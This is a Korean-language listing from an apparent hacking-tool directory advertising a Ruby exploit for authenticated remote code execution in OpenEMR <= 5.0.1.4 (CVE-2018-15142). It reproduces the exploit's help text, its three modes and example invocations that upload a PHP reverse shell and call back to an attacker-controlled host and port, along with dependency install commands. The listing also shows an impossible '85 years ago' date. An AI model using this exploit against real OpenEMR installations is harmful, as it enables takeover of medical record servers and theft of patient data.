Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
OpenEMR-RCE — OpenEMR <= 5.0.1 - (인증된) 원격 코드 실행 | Kitploit
도구/GitHubGitHub/noraj/openemr-rce
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubnoraj/openemr-rce

OpenEMR-RCE

OpenEMR <= 5.0.1 - (인증된) 원격 코드 실행

저장소 보기
85년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

OpenEMR RCE 익스플로잇 / PoC

OpenEMR <= 5.0.1.4 - (인증된) 원격 코드 실행

CVE-2018-15142에 대한 익스플로잇.

[EDB-49486] [PacketStorm] [WLB-2020080011]

사용법

root@kitploit:~
$ ruby exploit.rb --help
OpenEMR <= 5.0.1.4 - (Authenticated) Remote Code Execution

Usage:
  exploit.rb manual --root-url <url> --shell <filename> --user <username> --password <password> [--debug]
  exploit.rb semi-auto --root-url <url> --user <username> --password <password> --payload <payload> --lhost <host> --lport <port> [--debug]
  exploit.rb auto --root-url <url> --user <username> --password <password> --lhost <host> --lport <port> [--debug]
  exploit.rb -H | --help

Options:
  -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder
  -s <filename>, --shell <filename>     Filename of the PHP reverse shell payload
  -u <username>, --user <username>      Username of the admin
  -p <password>, --password <password>  Password of the admin
  -m <payload>, --payload <payload>     Metasploit PHP payload
  -h <host>, --lhost <host>             Reverse shell local host
  -t <port>, --lport <port>             Reverse shell local port
  --debug                               Display arguments
  -H, --help                            Show this screen

Examples:
  exploit.rb manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123
  exploit.rb semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888
  exploit.rb auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999

모드

  • Auto: 대상과 리스너를 준비했다면 익스플로잇이 나머지를 처리합니다
  • Semit-auto: auto와 동일하지만 기본 php/reverse_php 대신 다른 페이로드를 지정하려는 경우에 사용합니다
  • Manual: 커스텀 PHP 리버스 셸이 이미 있다면 익스플로잇에서 이를 지정할 수 있습니다

요구 사항

  • httpclient
  • docopt.rb
  • (선택 사항) Metasploit Framework (auto 및 semi-auto 모드에서 리버스 셸 생성을 위한 msfvenom)

BlackArch 설치 예시:

root@kitploit:~
pacman -S ruby-httpclient ruby-docopt metasploit

gem 사용 예시:

root@kitploit:~
gem install httpclient docopt

참조

이것은 EDB-ID-48515를 개선하여 다시 작성한 것이며 EDB-ID-45202 파트 2의 구현입니다:

  • 인수를 사용합니다 (하드코딩된 값 대신)
  • 커스텀 PHP 리버스 셸을 허용하거나 msfconsole로 자동 생성합니다
  • 더 깔끔하고 더 많은 사용자 정의가 가능합니다
  • ruby를 사용합니다 (python2는 더 이상 사용되지 않음)

이 익스플로잇은 Ruby 2.7.1로 테스트되었습니다.

EDB-ID-48515 정보:

root@kitploit:~
Exploit Author: Musyoka Ian
Date: 2020-05-25
Vendor Homepage: https://www.open-emr.org/
Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile 
Version: < 5.0.1 (Patch 4)
Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
References: https://medium.com/@musyokaian/openemr-version-5-0-1-remote-code-execution-vulnerability-2f8fd8644a69
도구 다운로드